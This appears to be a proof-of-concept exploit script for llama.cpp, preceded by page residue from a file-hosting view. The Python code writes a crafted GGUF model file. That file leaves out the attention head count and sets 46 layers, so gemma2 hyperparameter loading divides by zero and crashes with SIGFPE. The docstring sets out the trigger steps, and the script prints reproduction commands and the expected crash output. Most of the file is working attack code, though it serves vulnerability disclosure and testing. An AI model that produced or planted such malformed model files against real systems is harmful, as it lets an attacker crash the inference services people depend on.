File size: 7,537 Bytes
ebf72e8
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
#!/usr/bin/env python3
"""
PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.

Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:

    hparams.f_attention_scale = type == LLM_TYPE_27B
        ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
        : 1.0f / std::sqrt(float(hparams.n_embd_head_k));

When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr
stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0.
This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.

The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
n_embd_head_k calculation, not the architecture-specific code at line 1347.

Platform behavior:
  - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
  - ARM64:  Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
            but UBSan catches it and aborts with exit code 134

Attack vector:
  1. Set general.architecture = "gemma2"
  2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
  3. Set gemma2.embedding_length = 4096 (any non-zero value)
  4. Set gemma2.context_length = 8192 (required)
  5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
  6. OMIT gemma2.attention.head_count (this is loaded with required=false)
  7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero

The crash occurs during load_hparams(), before vocab or tensor loading,
so no valid vocabulary or tensor data is needed.

Confirmed UBSan output:
  src/llama-model.cpp:1347:61: runtime error: division by zero
  SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
"""

import struct
import os

# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32

# GGUF KV type constants
GGUF_TYPE_UINT32  = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING  = 8


def write_string(f, s):
    """Write a GGUF string: uint64 length + chars (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)


def write_kv_string(f, key, value):
    """Write a KV pair with string value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)


def write_kv_uint32(f, key, value):
    """Write a KV pair with uint32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))


def write_kv_float32(f, key, value):
    """Write a KV pair with float32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))


def create_gemma2_divzero_gguf(output_path):
    """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.

    The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before
    vocab or tensor loading. So we need:
      - A valid GGUF v3 header
      - The required KV pairs for gemma2 (but NOT attention.head_count)
      - Zero tensors (the crash happens before tensors are loaded)
    """

    n_tensors = 0  # No tensors needed; crash is in hparams loading
    n_kv = 5       # Number of KV pairs (see below)

    with open(output_path, 'wb') as f:
        # ===== GGUF Header =====
        f.write(GGUF_MAGIC)                            # magic: "GGUF"
        f.write(struct.pack('<I', GGUF_VERSION))        # version: 3
        f.write(struct.pack('<Q', n_tensors))           # n_tensors: 0
        f.write(struct.pack('<Q', n_kv))                # n_kv: 5

        # ===== KV Pairs =====

        # 1. general.architecture = "gemma2"
        #    This selects LLM_ARCH_GEMMA2 in load_arch().
        write_kv_string(f, "general.architecture", "gemma2")

        # 2. gemma2.context_length = 8192
        #    Required (loaded at line 517 with required=true).
        write_kv_uint32(f, "gemma2.context_length", 8192)

        # 3. gemma2.embedding_length = 4096
        #    Required (loaded at line 518 with required=true).
        #    Must be non-zero so that n_embd / n_head(0) is a non-trivial division.
        write_kv_uint32(f, "gemma2.embedding_length", 4096)

        # 4. gemma2.block_count = 46
        #    Required (loaded at line 520 with required=true).
        #    46 layers triggers LLM_TYPE_27B at line 1341, which selects the
        #    vulnerable code path at line 1347 that divides by n_head(0).
        write_kv_uint32(f, "gemma2.block_count", 46)

        # 5. gemma2.attention.layer_norm_rms_epsilon = 1e-6
        #    Required for gemma2 (loaded at line 1334 with required=true).
        #    This must be present or load_hparams() throws before reaching line 1347.
        write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6)

        # DELIBERATELY OMITTED: gemma2.attention.head_count
        # This key is loaded at line 571 with required=false:
        #   ml.get_key_or_arr(LLM_KV_ATTENTION_HEAD_COUNT, hparams.n_head_arr, hparams.n_layer, false);
        # When omitted, n_head_arr stays filled with 0s (from std::fill at line 552).
        # Then at line 1347: hparams.n_embd / hparams.n_head(0) = 4096 / 0 => SIGFPE

        # ===== Alignment padding =====
        # Even with 0 tensors, pad to alignment boundary for spec compliance.
        current_pos = f.tell()
        aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print(f"[*]")
    print(f"[*] Vulnerability details:")
    print(f"[*]   Architecture:  gemma2 (LLM_ARCH_GEMMA2)")
    print(f"[*]   block_count:   46 (triggers LLM_TYPE_27B)")
    print(f"[*]   embedding_length: 4096")
    print(f"[*]   head_count:    OMITTED (stays 0 from std::fill)")
    print(f"[*]")
    print(f"[*]   Crash location: src/llama-model.cpp:1347")
    print(f"[*]     hparams.n_embd / hparams.n_head(0)")
    print(f"[*]     = 4096 / 0")
    print(f"[*]     => integer division by zero (UB)")
    print(f"[*]")
    print(f"[*] Test with (x86_64 -- deterministic SIGFPE crash):")
    print(f"[*]   ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print(f"[*]   Expected: SIGFPE, exit code 136")
    print(f"[*]")
    print(f"[*] Test with UBSan (any platform -- clean UB report):")
    print(f"[*]   cmake -B build-ubsan \\")
    print(f"[*]     -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print(f"[*]     -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print(f"[*]     -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
    print(f"[*]     -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
    print(f"[*]     -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
    print(f"[*]   cmake --build build-ubsan -j$(nproc)")
    print(f"[*]   ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
    print(f"[*]   Expected: 'runtime error: division by zero', exit code 134")


if __name__ == "__main__":
    output_dir = "/Users/eltarne/Documents/script/gguf_poc"
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
    create_gemma2_divzero_gguf(output_path)